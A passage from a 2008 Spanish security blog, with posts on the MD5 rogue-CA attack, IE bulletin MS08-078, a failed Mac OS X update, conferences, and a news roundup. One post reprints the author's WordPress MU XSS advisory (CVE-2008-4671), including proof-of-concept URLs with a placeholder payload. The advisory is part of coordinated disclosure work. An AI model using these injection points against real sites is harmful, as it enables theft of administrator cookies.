del navegador), y en realidad cualquier protocolo que use SSL . Pero la pregunta es, quien sigue usando MD5 a día de hoy para cosas serias? y la triste respuesta es que muchos sistemas..., de los 30k certificados que cogieron para realizar el ataque, 9k estaban firmados con md5, a rapidssl.com se le ha atribuido el 97% de ellos.<br/><br/><a href="http://blogs.ua.es/jgaliana/files/2008/12/candadito.gif"><img src="http://blogs.ua.es/jgaliana/files/2008/12/candadito.gif" alt="" width="120" height="30" class="aligncenter size-full wp-image-275" /></a><br/><br/>Para saber si el sitio que visitamos puede correr peligro de ser suplantado y por lo tanto permitiría ataques 'man-in-the-middle' sobre SSL, desde Firefox, podemos ir a "Herramientas" -> "Información de la página" -> "Seguridad" -> "Ver Certificado" -> "Detalles" -> "Algoritmo de firma del certificado". Si veis algo como "PKCS #1 SHA-1 con cifrado RSA" estais a salvo, sin embargo si aparece "MD5" entonce ese sitio es vulnerable.<br/><br/>Este tipo de ataques podrían conducir a ataques de phising "perfectos" o indetectables, con certificados SSL válidos o bien se podrían combinar junto con el <a href="http://blogs.ua.es/jgaliana/2008/07/29/publicados-los-detalles-sobre-el-caso-kaminsky/">fallo descubierto por Dan Kaminsky hace unos meses sobre DNS Poisoning</a>, por lo que serían totalmente eficaces y de muy dificil detección, debido a que la victima no podría darse cuenta que el sitio está siendo suplantado. Este tipo de vulnerabilidades podría llegar a afectar o "salpicar" a la banca o comercio online, ya que son el tipo de tecnologías que usan como medida de seguridad para el protocolo de datos entre el cliente y el servidor, es un tema bastante serio.<br/><br/>La solución pasa porque ningún CA firme con MD5, y sólo se utilice SHA1 o algoritmos más seguros (SHA-2 todavia está en desarrollo y no está totalmente soportado), al mismo tiempo los navegadores tienen que actualizar sus blacklist para revocar esos certificados, mozilla y microsoft se han pronunciado, más abajo os dejo los enlaces.<br/><br/><br/>Enlaces:<br/><br/><a href="http://phreedom.org/research/rogue-ca/">Información detallada</a><br/><a href="http://www.win.tue.nl/hashclash/rogue-ca/">Más información técnica</a><br/><a href="http://phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt">Presentación en el congreso</a><br/><a href="https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/">Sitio de demo</a> (poner la hora del sistema anterior a Agosto 2004 antes de hacer click<br/><br/>Certificados:<br/><br/><a href="http://www.win.tue.nl/hashclash/rogue-ca/real.cert.pem">Certificado real</a><br/><a href="http://www.win.tue.nl/hashclash/rogue-ca/rogue_ca.cert.pem">Certificado modificado</a><br/><br/><br/>Respuesta de Mozilla/Microsoft:<br/><a href="http://blog.mozilla.com/security/2008/12/30/md5-weaknesses-could-lead-to-certificate-forgery/"><br/>Mozilla</a><br/><br/><a href="http://www.microsoft.com/technet/security/advisory/961509.mspx">Microsoft</a> y <a href="http://blogs.technet.com/msrc/archive/2008/12/30/information-on-microsoft-security-advisory-961509.aspx">2</a><br/><br/><br/><br/>Referencias:<br/><br/><a href="http://isc.sans.org/diary.html?storyid=5587">ISC SANS: MD5 Considered harmful today - Creating a rogue CA certificate</a><br/><a href="http://isc.sans.org/diary.html?storyid=5590"><br/>ISC SANS: MD5 SSL Summary</a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-69817315085156146412008-12-19T06:13:00.000-08:002009-09-18T09:58:01.118-07:00Predicciones de seguridad informática para 2009<a href="http://blogs.ua.es/jgaliana/files/2008/12/network-security.png"><img src="http://blogs.ua.es/jgaliana/files/2008/12/network-security-150x150.png" alt="" width="150" height="150" class="alignleft size-thumbnail wp-image-252" /></a>Os dejo una nota corta, leída en el blog de <a href="http://caballe.cat/wp/prediccions-sobre-seguretat-informatica-per-lany-2009/">Xavier Caballé</a> sobre las predicciones de seguridad informática para el año 2009 que lo tenemos ahí mismo:<br/><br/><em><a href="http://www.crn.com/security/212201985">10 Security Predictions for 2009</a> </em>(Channel Web)<br/><em><a href="http://www.sans.edu/resources/securitylab/2009_predictions.php">2009 Security Predicitions</a> </em>(SANS Institute)<br/><em><a href="http://www.cio.com/article/462333/Security_Predictions_Experts_Look_Ahead_to_and_Beyond">Security Predicitions: Experts Look Ahead to 2009 and Beyond</a> </em>(CIO.com)<br/><em><a href="http://www.csoonline.com/article/463067/Rich_Mogull_Infosec_Trends_for_">Rich Mogull: 7 Infosec Trends for 2009</a> </em>(CSO Online)Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-83230281622028064102008-12-17T14:47:00.000-08:002009-09-18T09:58:01.118-07:00BSOD en Mac OS X: actualización a 10.5.6[caption id="attachment_237" align="alignleft" width="472" caption="Kernel Panic Mac OS X"]<a href="http://blogs.ua.es/jgaliana/files/2008/12/kernel_panic-1p0f.png"><img class="size-full wp-image-237" src="http://blogs.ua.es/jgaliana/files/2008/12/kernel_panic-1p0f.png" alt="kernel_panic_mac_os_x" width="472" height="255" /></a>[/caption]<br/><br/>Puestos a criticar, aquí no se salva nadie... ahora le toca el turno a Apple.<br/><br/>Hace apenas un par de días salió la actualización de Leopard a 10.5.6, en principio todo pintaba bien, añadía funcionalidades, actualizaba ciertos componentes, corrgía bugs: Brian Krebs, del washington post, anunciaba que <strong><a href="http://voices.washingtonpost.com/securityfix/2008/12/apple_patches_21_security_flaw.html">Apple corregía de esta manera 21 fallos de seguridad</a>.</strong> y al parecer se iba a convertir en la última actualización antes del esperado Mac OS X 10.6 "<em>Snow Leopard</em>" para los colegas.<br/><br/>Pero llegaron los problemas, un buen número de usuario se quejan de los múltiples <a href="http://www.theinquirer.es/2008/12/17/problemas-con-mac-os-x-1056.html">problemas que están teniendo con las actualizaciones</a>, y a mí también me ha tocado.<br/><br/>He actualizado varias máquinas, Mac Mini PowerPC, Macbook pro Intel, IMac 20" pero por último ha fallado una máquina un IMac 24" Intel. La actualización no se llegó a instalar correctamente, al reiniciarse el sistema era completamente inestable (fallos inesperados en varios procesos.., no funciona el sonido, etc), y después de un reinicio forzado, la máquina ya no vuelve a arrancar mostrando la pantalla de un bonito kernel panic caraácteristico de Mac que ya había visto otras veces, pero esta vez en el arranque, pocos segundos después de pulsar el botón de encendido, dejando la máquina totalmente inútil.<br/><br/>Al parecer los de Apple le quieren hacer la competencia a M$ con los pantallazos azules <em><a href="http://en.wikipedia.org/wiki/BSOD">(BSOD, Blue Screen Of Death)</a></em>, en este caso color gris. Lo cierto es que, pretendiendo ser un sistema operativo serio, no pueden permitirse este tipo de fallos, realmente están preparados para el desspliegue a nivel corporativo?<br/><br/><strong>Actualización 19/12</strong>: Apple reconoce que existen problemas con la actualización a 10.5.6, al parecer el paquete que distribuyeron estaba incompleto.<br/><br/>Referencia: <a href="http://support.apple.com/kb/TS2383">http://support.apple.com/kb/TS2383</a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com2tag:blogger.com,1999:blog-665899775980305966.post-77554401558492393262008-12-17T14:10:00.000-08:002009-09-18T09:58:01.118-07:00Internet Explorer: Critical Microsoft Security Bulletin MS08-078[caption id="attachment_220" align="alignleft" width="228" caption="IE Bug"]<a href="http://blogs.ua.es/jgaliana/files/2008/12/ie7bug.jpg"><img class="size-full wp-image-220" src="http://blogs.ua.es/jgaliana/files/2008/12/ie7bug.jpg" alt="ie7bug" width="228" height="274" /></a>[/caption]<br/><br/>Hola,<br/><br/>Cuando por primera vez lo leí, hace ya días, pensé "bueno.. uno más", pero este bug está dando mucho que hablar.<br/><br/>En primer lugar anunciaron que sólo afectaba a IE7, la vulnerabilidad salió a la luz en un foro chino un día antes del segundo martes de diciembre (que pillos!, los segundos martes de cada mes es cuando m$ distribuye los parches de actualizaciones, dejandoles literalmente <em>en bragas</em>), el problema se complicó muchísimo al notificar un investigador de seguridad danés que <strong>la vulnerbailidad se extendía a todas las versiones de Internet Explorer y afecta a todos los sistemas operativos Windows</strong>. Este fallo, que reside en el manejo de etiquetas XML, <strong>permite ejecutar código arbitrario en la máquina remotamente sin intervención alguna por parte del usuario,</strong> sólo es necesario que se visite una página web con Internet Explorer para que el malware sea instalado en la máquina.<br/><br/>Microsoft recomendaba deshabilitar el fichero Oledb32.dll para permanecer seguro (así como no navegar como administrador) y tener actualizados los antivirus, anti-spyware, activado firewall, etc... <em>'lo qué?</em> ' Es decir,... como saben que puede entrar cualquier virus o similar y no son capaces de evitarlo, actualiza el antivirus y agarrese quien pueda... no creo que sea una medida decente, aún te quedan ganas de seguir usando IE? sigue leyendo...<br/><br/>Además, anunciaron que había un bajo riesgo de infectarse, a pesar de la gran fauna de malware que está aprovechando esta vulnerabilidad y está actualmente <em>in the wild</em>, alegando que un número muy bajo de páginas web estaban infectando máquinas y que había un porcentaje muy bajo de infectarse... viva!! juguemos a la ruleta rusa! No es de recibo... <strong>Cuando se sabe a ciencia cierta que hay <a href="http://www.theinquirer.es/2008/12/17/parche-de-emergencia-para-internet-explorer-hoy-mismo.html">más de dos millones de máquinas infectadas debido a esta vulnerabilidad y más de 10.000 páginas web con el código javascript malicioso</a></strong>... ejem!<br/><br/>Por todo esto las empresas de seguridad han recomentado la instalación y uso de otros navegadores, como Firefox, Opera, Safari o Chrome, por lo que por fin hoy, deciden sacar el parche fuera de ciclo (como era de esperar), aunque ha dejado como semana y media para que cualquiera lo explote siendo publico (viva el full-disclosure!). En <a href="http://www.theinquirer.es/2008/12/17/parche-de-emergencia-para-internet-explorer-hoy-mismo.html">theinquirer</a> comentan sobre el lanzamiento del parche "El mismo será distribuido desde Windows Update, Microsoft Update y Windows Server Update Services (WSUS), para usuarios de Windows 2000, XP, Vista, Server 2003 y Server 2008. El parche debe corregir la vulnerabilidad en IE5.01, IE6 e IE7. Para IE8, actualmente en fase beta, la corrección llegará posteriormente ya que no ha sido incluido en la lista de navegadores soportados."<br/><br/>Vamos, a cualquiera le puede pasar, no existe software 100% seguro, no existe aún técnica o manual que pueda certificarlo, pero hay maneras y maneras... y cuando ha pasado ya muchas veces (ya no sólo a nivel de navegador, sino de sistema.... recordemos el blaster, sasser, y los ya más recientes MS08-67, MS08-68...), es hora de plantearse que software usas teniendo en cuenta que mucha gente, un porcentaje muy alto del tiempo que pasa ante una máquina es con el navegador abierto.<br/><br/>Se puede aprender algo de todo esto, siempre se aprende algo de los errores, podemos seguir varios consejos como no navegar con un usuario con privilegios que no necesite (nunca como adminsitrador), tener un sistema de protección para el sistema y la red..., hay gente que no sigue ninguno de ellos e incluso nunca sabrá que existió este fallo.<br/><br/>Personalmente recomendaría un navegador que me ofrezca cierta garantía de calidad/seguridad, <strong>yo apuesto por Firefox y Opera, </strong>tu por cuál apuestas?<br/><br/>Desde el <a href="http://isc.sans.org/diary.html?storyid=5515">Sans ISC nos avisan del lanzamiento del parche MS08-078</a>, y recalcan que no sustituye al MS08-073 de principios de mes, <strong>ambos son necesarios para hacer a IE "seguro"</strong><br/><br/>Feliz upgrade a la gente que siga usando IE, recordar es imprescindible actualizarlo, y también podeis replantearos si sería conveniente cambiar de navegador. Un dato curioso es que durante este proceso según un estudio la <a href="http://en.wikipedia.org/wiki/Usage_share_of_web_browsers">cuota del IE ha bajado al 70%</a>, siendo tan fácil descargar e instalar un navegador, y lo poco traumático que es ya que te importan los marcadores y demás.<br/><br/>Es hora de reflexionar!<br/><br/>Referencias (en este enlace podeis encontrar información técnica y muchas otras referencias):<br/><br/><a href="http://www.nist.org/news.php?extend.263">NIST IT Security: Internet Explorer XML Exploit Allows Remote Code Execution</a><br/><br/><a href="http://www.microsoft.com/technet/security/bulletin/MS08-078.mspx"><br/>Instalar parche [microsoft.com]</a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com12tag:blogger.com,1999:blog-665899775980305966.post-48205639256111319572008-11-27T02:56:00.000-08:002009-09-18T09:58:01.118-07:00Botelín de Seguridad: WordPress MU < 2.6 wpmu-blogs.php Cross Site
Scripting vulnerabilityHola,<br/><br/>Wordpress-MU, es la versión multi usuario de Wordpress, permite ejecutar ilimitadas instancias de blogs con una única instalación de wordpress. Su uso está muy extendido, algunos ejemplos son Wordpress.com (índice 28 en Alexa) o en universidades como Harvard.<br/><br/>Este post tenía que haber visto la luz hace tiempo (por septiembre), pero se ha demorado hasta ahora.<br/>El 6 de agosto, publiqué un <a href="http://blogs.ua.es/jgaliana/2008/08/06/wordpress-26-wordpress-mu-multi-user-26-is-out-llamamiento-a-la-actualizacion/">llamamiento a la actualización para Wordpress MU < 2.6</a> debido a un bug encontrado que hacía posible el robo de credenciales.<br/><br/>Todo empezó el 14 de Mayo, cuando debido a mi trabajo, empezamos a trabajar con Wordpress MU, lo genial que tiene el código abierto es que tu mismo puedes auditar el código que va a correr sobre tus máquinas, siendo esto esencial. Ese mismo día, realizando unas pruebas a la plataforma encontré un bug XSS (Cross Site Scripting) en el panel de adminstración que permite a un atacante robar las cookies al Administrador del sitio y (tenga o no tenga usuario en el sistema) convertirse <em>automágicamente</em> en Adminsitrador Global del Sitio.<br/><br/>Ese mismo día el error fue notificado al equipo de desarrollo de Wordpress MU, me sincronizé con ellos para parchear el código en la rama trunk, después de un par de intentos (en el primero se les quedo un cabo suelto ;)) por fin, sólo dos días después (el 16 de mayo) conseguimos solventar completamente el problema. Más tarde veía la luz la esperada versión 2.6 que incluía esta serie de parches. La solución pasa por instalar cualquier versión superior o igual a la 2.6, tan sólo hace dos días anunciaban el lanzamiento de la versión 2.6.5<br/><br/>Quiero agradecer al equipo de desarrollo, en especial al desarrollador principal <a href="http://ocaoimh.ie/">Donncha</a> por su cooperación y también por <a href="http://ocaoimh.ie/2008/07/28/wordpress-mu-26/">añadirme en los créditos</a>. Gracias!<br/><br/>Del mismo modo los administradores de esta red en la Universidad de Alicante también fueron notificados lo antes posible sobre el error, y proporcioné los parches que eran necesarios.<br/><strong><br/>El boletín de seguridad ha sido publicado en los sitios web y listas con más renombre a nivel internacional y las bases de datos de vulnerabilidades más relevantes sobre seguridad informática:</strong><br/><strong><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4671"><br/>CVE ID: 2008-4671 Common Vulnerabilities and Exposures </a><br/><a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4671">NVD, National Vulnerability Database del NIST (US-CERT)</a><br/><a href="http://www.securityfocus.com/bid/31482">Bugtraq ID, SecurityFocus</a><br/><a href="http://secunia.com/advisories/32060/">Secunia Advisory ID</a><br/><a href="http://osvdb.org/show/osvdb/48635">OSVDB, Open Source Vulnerability Database</a><br/><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064748.html">Full-disclosure</a></strong><br/><br/><br><br><p><br/><br/><br/>Podeis leer el Advisory entero aquí mismo:<br/><br/><br/><br/> - Security Advisory -<br/><br/>- - WordPress MU < 2.6 wpmu-blogs.php Cross Site Scripting vulnerability -<br/>- -----------------------------------------------------------------------<br/><br/><br/>Product: Wordpress-MU (multi-user)<br/>Version: Versions prior to 2.6 are affected<br/>Url: http://mu.wordpress.org<br/>Affected by: Coss Site Scripting Attack<br/><br/><br/>I. Introduction.<br/><br/>Wordpress-MU, or multi-user, allows to run unlimited blogs with a<br/>single install of wordpress. It's widely used, some examples are<br/>WordPress.com or universities like Harvard<br/><br/><br/>II. Description and Impact<br/><br/>Wordpress-MU is affected by a Cross Site Scripting vulnerability, an<br/>attacker can perform an XSS attack that allows him to access the<br/>targeted user cookies to gain administrator privileges<br/><br/>In /wp-admin/wpmu-blogs.php an attacker can inject javascript code,<br/>the input variables "s" and "ip_address" of GET method aren't properly<br/>sanitized <br/><br/><br/>Here is a poc:<br/><br/>PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s=%27[XSS]<br/>PoC:<br/>http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address=%27[XSS]<br/><br/><br/>The impact is the attacker can gain administrator privileges on the<br/>application.<br/><br/><br/>III. Timeline<br/><br/>May 14th, 2008 - Bug discovered<br/>May 14th, 2008 - Vendor contacted and the start of a syncronized<br/>code patching<br/>May 16th, 2008 - MU trunk code fixed<br/>July 28th, 2008 - WPMU 2.6 released<br/>September 2nd, 2008 - WPMU 2.6.1 released<br/>September 29th, 2008 - Security advisory released<br/><br/><br/>IV. Solution<br/><br/>Upgrade to version 2.6 or upper of wordpress multi-user. It can be<br/>downloaded from http://mu.wordpress.org<br/><br/><br/>V. Credits<br/><br/>Juan Galiana Lara<br/>http://blogs.ua.es/jgalianaJuan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com12tag:blogger.com,1999:blog-665899775980305966.post-76847781109496183152008-11-27T02:29:00.000-08:002009-09-18T09:58:01.118-07:00GNU/Linux en tu llavero: Distribuciones Live y VirtualizaciónUna nota rápida para daros el enlace a las <em>slides</em> que utilizamos Héctor y yo en el <a href="http://blogs.ua.es/jgaliana/2008/11/26/iv-jornadas-por-el-conocimiento-abierto-y-el-software-libre-celebradas-en-la-universidad-de-alicante/">taller sobre GNU/Linux que comenté ayer en la universidad</a> que llevaba por nombre el título de este post<br/><br/><strong><a href="http://svn.gula.es/cursos/copla2008/LinuxLive2008.pdf">Descarga: PDF [1.9M]</a></strong>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-64844477340857528792008-11-26T09:50:00.000-08:002009-09-18T09:58:01.118-07:00IV Jornadas por el Conocimiento Abierto y el Software Libre celebradas
en la Universidad de AlicanteHola!,<br/><br/>La semana pasada durante los días 20 y 21 de Noviembre se celebraron las <em>IV Jornadas por el Conocimiento Abierto y el Software Libre</em> en la Universidad de Alicante.<br/><br/>Este evento está organizado de la mano del Vicerrectorado de Tecnología e Innovación Educativa a través de la iniciativa <a href="http://copla.ua.es">COPLA</a> la cual tiene como objetivo difundir el conocimiento abierto e implantar soluciones de software libre en la universidad.<br/><br/>El primer día consistió en conferencias, a las cuales, sólo pude acercarme a la primera, que estuvo interesante, trató sobre start-ups relacionadas con el softeware libre, y el segundo día se impartieron varios talleres.<br/><br/>Un par de miembros de <a href="http://gula.es">GULA</a> (Grupo de Usuario de Linux de Alicante) impartimos un taller sobre <strong>GNU/Linux: Distribuciones Live y Virtualización</strong> en dos sesiones y que tuvo una muy buena acogida, presentando las ventajas del uso de dispositivos de almacenamiento externo usb como soporte para llevar GNU/Linux a cualquier lugar, ya fuera de forma arrancable mediante sistemas live o empleando software de virtualización, con las ventajas que esto conlleva: sin interacción con el disco, problemas con permisos, privacidad, cómodidad en cuanto a perfiles y datos móviles, un sistema totalmente personalizado y con persistencia de datos.<br/><br/>Por último se presentó una solución para virtualizar GNU/Linux sin requerir instalar ningún tipo de software en la máquina gracias a Qemu (actualmente único software que permite realizar este tipo de técnica) por la cual, podemos llevar en un dispositivo de almacenamiento usb tanto la imagen como el software de virtualización al más estilo "todo en 1".<br/><br/>Este tipo de eventos sirve para concienciar a la gente en este movimiento, que ya a día de hoy es imparable, y para convencer a la gente que piensa del modo "eso es una moda", o "tiene los días contados"..., señores el software libre ha llegado para quedarse.<br/><br/>Más tarde tengo pensado colgaros la presentación, así como un par de post pendientes...<br/><br/><br/><a href="http://blogs.ua.es/jgaliana/files/2008/11/logouap.gif"><img src="http://blogs.ua.es/jgaliana/files/2008/11/logouap.gif" alt="" width="189" height="32" class="alignnone size-full wp-image-197" /></a></a><a title="GULA" href="http://gula.es"><img src="http://blogs.ua.es/jgaliana/files/2007/11/logo_gula.gif" alt="GULA" /></a><a title="COPLA" href="http://copla.ua.es"><img src="http://blogs.ua.es/jgaliana/files/2007/11/logocopla.jpg" alt="COPLA" /></a><br/><br/><br/>Saludos!Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com4tag:blogger.com,1999:blog-665899775980305966.post-62086033087582304912008-11-06T16:49:00.000-08:002009-09-18T09:58:01.119-07:00Últimos Congresos y Jornadas relacionados con InformáticaHola,<br/><br/>Hace ya bastante tiempo desde la última vez que escribí por aquí... aunque tengo intención de recuperar el hilo para publicar muchas ideas que tengo en la cabeza.<br/><br/>En este post enumero rápidamente algunos de los <strong>últimos congresos/jornadas a los que he asistido</strong>:<br/><br/>- <strong>Google Developer Day 2008</strong> (25 Sept 2008) Madrid. Google Inc.<br/><br/>Google Developer Day es un evento que se celebra un varias ciudades a lo largo de todo el mundo, y en concreto en Madrid es el 2º año que se realiza. Consta de conferencias técnicas y talleres a manos de los ingenieros de Google y el lugar elegido fue el parque de atracciones de madrid, además este año coincidió con el 5º Aniversario de Google España y a última hora hubo fiesta y tarta de cumpleaños. Yo personalmente lo pasé muy bien y la organización fue excelente, aprovecho para mandar un saludo para Clara e Isabel, sin olvidarme de Chewy ;)<br/><br/>- <strong>Encuentro Multidisciplinar sobre Tecnologías de la Información y las Comunicaciones para la Asistencia Social y Sanitaria</strong>. Oct 2008. Grupo de domótica y ambientes inteligentes. Dpto Tecnología Informática y Computación. Universidad de Alicante<br/><br/>- <strong>V Jornadas para el Desarrollo de Grandes Aplicaciones en Red (JDARE)</strong>. Grupo de investigación de Redes y Middleware. Dpto. Tecnología Informática y Computación. Oct 2008 Universidad de Alicante<br/><br/>- <strong>Asegur@IT IV</strong>. Microsoft TechNet, S21Sec, CryptoRed (UPM), Informática64, Debian. 27 Oct 2008.<br/>Evento sobre seguridad informática dirigido a profesionales de IT, celebrado en el Centro de Formación en Tecnologías de la Información y Comunicaciones Madrid-Sur Getafe, (Madrid), la agenda fue muy interesante:<br/><br/>Alfonso Muñoz (UPM): Esteganografía 2.0: Pasado, presente y futuro de la ocultación de las comunicaciones<br/>David Barroso (S21Sec): Botnets 2.0: adquiriendo el control de Internet<br/>Chema Alonso (Informática64): RFD. Descarga de ficheros con Blind SQL Injection<br/>Luciano Bello (Debian). Debian OpenSSL Bug, el cómo, el porqué y las consecuencias<br/>Héctor Sánchez Montenegro (Microsoft) ¿Qué está haciendo Microsoft en Seguridad?<br/><br/>Además tuve la oportunidad de intercambiar algunas palabras con Chema Alonso y Luciano Bello, espero poder volver a asistir a otro de los muchos eventos que organizan y porqué no, colaborar con ellos en un futuro.<br/><br><br><br>.<br><br><br/><strong>En el punto de mira:</strong><br/><br/>- <strong>III Congreso de Software Libre de la Comunidad Valenciana</strong>. Conselleria d’Educació de la Generalitat Valenciana. Palacio de Congresos de Alicante<br/><br/>Los días 5, 6 y 7 de Noviembre se está celebrando en Alicante este congreso de Software Libre que reúne a 1500 asistentes y ponentes de todo el mundo para hablar de algo que hoy día se ha convertido en imprescindible cuando hablamos de informática: El Software Libre.<br/><br/>Tuve la oportunidad de estar ayer y hoy mismo, han habido gran cantidad de charlas y talleres durante todo el día. Mañana se clausurará el evento alrededor de la 13:00 horas.<br/><br/>En el congreso además de presentar la nueva versión de Lliurex (8.09), han venido hasta Alicante personalidades importantes del mundillo como Jon "Maddog" Hall (de Linux Internacional), y que hoy mismo asistí a su conferencia (aunque no es la primera vez que le veía), a los que se suman Marcelo Tosatti (Red Hat) y muchos otros (gente de Sun, Mozilla, OpenOffice, Ubuntu, etc).<br/><br/>También volvió a España Luciano Bello (desarrollador de Debian) con el que pude charlar un rato. Del mismo modo ha habido tiempo para mesas redondas locales, como la de hoy a última hora sobre software libre en las universidades de la comunidad valenciana en la que ha participado el Vicerrector de Tecnología e Innovación Educativa de la UA, y que ha resultado entretenida ya que cada participante ha expuesto qué se está haciendo en cuanto a promoción y uso del software libre en su universidad y se han visto distintos puntos de vista.<br/><br/>Destacar la gran cantidad de conferenciantes (durante tres días, dos de ellos mañana y tarde) con 5 salas más el auditorium, realizandose conferencias y talleres simultaneamente, además de la presencia de empresas con stands en la primera planta.<br/><br/>Simplemente decir que espero no perderme el IV!<br/><br/>- <strong>IV Jornadas por el Conocimiento Abierto y Software Libre de la Universidad de Alicante</strong>, ya tenemos la vista puesta en estas jornadas que organiza el Vicerrectorado de Tecnología e Innovación Educativa a través del Proyecto COPLA (Conocimiento Abierto y Software Libre en la Universidad de Alicante) donde participaremos como otros años atrás, ya os contaré más. Será el 20 y 21 de noviembre y estais todos invitados.<br/><br/>Enlace: <a href="http://copla.ua.es">http://copla.ua.es</a><br/><br/>- <strong>Encuentro Interdisciplinar de Domótica</strong>. Dpto. Tecnología Informática y Computación, que tendrá lugar los próximos 11 y 12 de diciembre en la Universidad de Alicante<br/><br/>Enlace: <a href="http://www.dtic.ua.es/dai/eid/">http://www.dtic.ua.es/dai/eid/</a><br/><br/>Por ahora eso es todo.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-89222918949371563912008-08-31T13:26:00.000-07:002009-09-18T09:58:01.119-07:00Se acabaron las vacaciones...Hola,<br/><br/>Bueno hoy ya es el último día de agosto, y el blog ha estado algo parado... estabamos de vacaciones!<br/><br/>Estos días han pasado muchas cosas, entre las más destacadas y curiosas del mundillo se encuentran:<br/><br/>* Como anunció Rasmus Lerdorf en la charla de Valencia hace unas semanas, el 7/8/2008 <a href="http://www.php.net/archive/2008.php#id2008-08-07-1">se lanzó la última versión de PHP 4 (la 4.4.9)</a>. A partir de ahora la rama estable es la 5.2.<br/><br/>* Se celebró el <a href="http://blackhat.com/">Black Hat</a> USA 2-7 Agosto (en Las Vegas), entre la gran cantidad de charlas destacó Kaminsky hablando sobre vulnerabilidades del protocolo DNS.<br/>* También se celebró la <a href="http://defcon.org/">Defcon</a> 16 en las Vegas, y como siempre con su concurso "Capture the Flag", en el que este año el grupo español no ha tenido mucha suerte...<br/>Entre ambas convenciones se han creado una serie de artículos y herramientas muy interesantes, a por ellos!<br/><br/>* <a href="http://www.debian.org/">Debian</a> cumple 15 años!: El 16 de agosto de 1993 Ian Murdock mandaba un mensaje a la lista de distibución <a href="http://groups.google.com/group/comp.os.linux.development/msg/a32d4e2ef3bcdcc6">comp.os.linux.development</a> donde anunciaba la disponibilidad de una nueva distribución llamada Debian. Distribución en la que se han basado otras muy conocidas como Knoppix o Ubuntu. Una de sus grandes virtudes, que otros han copiado es su sistema de gestión de paquetes: <a href="http://en.wikipedia.org/wiki/Advanced_Packaging_Tool">APT</a>. También se celebró la <a href="http://www.debconf.org/">Debconf</a> 8 en Mar de la Plata, Argentina. El año que viene para la Defcon9 (2009) el lugar elegido es Extremadura: "DebConf9 will take place in Cáceres, Extremadura, Spain." Stay tuned for more details!. Espero que nos veamos por allí.<br/><br/>* El <a href="http://www.us-cert.gov/current/#ssh_key_based_attacks">US-CERT avisa sobre un aumento de ataques contra servidores Linux</a> mediante el uso de claves SSH comprometidas. Al parecer todo indica que debido al fallo de debian.<br/><br/>* Comprometidas <a href="http://isc.sans.org/diary.html?storyid=4928">8 millones de tarjetas de crédito de Best Western</a>, aunque los datos estaban certificados bajo <a href="http://en.wikipedia.org/wiki/PCI_DSS">PCI-DSS (Payment Card Industry Data Security Standard)</a>. <br/><br/>* Avances en Cisco IOS Shellcode: Andy Davis publica su "<a href="http://seclists.org/vuln-dev/2008/Aug/0003.html">Version-independent IOS shellcode</a>". Uno de los mayores problemas que tenía la explotación en sistemas IOS era la gran cantidad de versiones IOS que existen, cada uno con direcciones diferentes para ejecutar shellcodes útiles... cuidado cisco, Andy lo ha conseguido. <br/>Quiero hacer notar, y este es un claro ejemplo, como cuando una plataforma cobra gran popularidad la gente empieza a interesarse por ella... otro claro ejemplo, y que de ahora en adelante tendremos que tener muy en cuenta, es la plataforma Mac de Apple.<br/><br/>* Al hilo de la frase anterior, macro-actualización de Apple, <a href="http://voices.washingtonpost.com/securityfix/2008/08/apple_patches_dns_flaw_and_16.html">Security Update 2008-005</a>, fija 17 vulnerabilidades, todos los que usen esta plataforma deberían instalarla. También <a href="http://www.kriptopolis.org/parche-dns-apple-tarde-y-mal">Apple ha sido criticada por el lanzamiento del parche para DNS: tarde y mal.</a><br/><br/>* <a href="http://linux.slashdot.org/article.pl?sid=08/08/22/1341247">Los servidores de RedHat y Fedora han sido comprometidos</a>. Fedora ha cambiado su clave de firmado de paquetes. En el enlace, hay información del aviso publico por RedHat y un script para saber si estás afectado. El caso ha sido sonado hasta el punto que en <a href="http://www.oreillynet.com/onlamp/blog/2008/08/fedora_authentication_server_b.html">OnLamp se preguntan si Fedora está preparado para entornos de producción.</a> <br/><br/>* Publican un <a href="http://www.oreillynet.com/onlamp/blog/2008/08/codeplex_vs_sourceforge_most_d.html">listado del "top 10" de software más descargado en Sourceforge y Codeplex.</a><br/><br/>* Publicado <a href="http://www.oreillynet.com/onlamp/blog/2008/08/samba_321.html">Samba 3.2.1 con mejoras en el soporte de Windows Server 2003/2008</a><br/><br/>* <a href="http://voices.washingtonpost.com/securityfix/2008/08/kaminsky_details_dns_flaw_at_b.html">Kaminsky habla sobre el DNS en Las Vegas</a>, a la par que un <a href="http://www.theinquirer.es/2008/08/10/fisico-ruso-hackea-el-parche-de-vulnerabilidad-dns.html">físico ruso burla el parche de Kaminsky en 10 horas</a>.<br/><br/>* En medio de todo este lio con los DNS, sale a luz según Wired "<a href="http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html">El mayor agujero de seguridad de Internet!</a>" (ojo... que eso mismo dijeron con lo del DNS), esta vez dos expertos en seguridad publican un ataque <a href="http://blog.wired.com/27bstroke6/2008/08/how-to-intercep.html">man in the middle en el protocolo BGP (Border Gateway Protocol),</a> Kim Zetter lo explica muy bien en estas dos entradas.<br/><br/>* <a href="http://www.kriptopolis.org/la-puntilla-para-vista">Desde kriptopolis publican un grave bug en Microsoft Windows Vista</a>, y ya no es que quieran aprovechar cualquier pequeño despiste para poner a parir a los de m$..., o que sea un falló más de vista, sino que han encontrado un fallo de arquitectura mediante el cual cualquier dll cargada mediante .NET se considera segura. Lo que quiere decir que si podemos cargar una dll (desde una página web, sesión o de la manera que se os ocurra) se puede llegar a tener control total sobre la máquina. Según dicen "es una técnica muy sencilla de 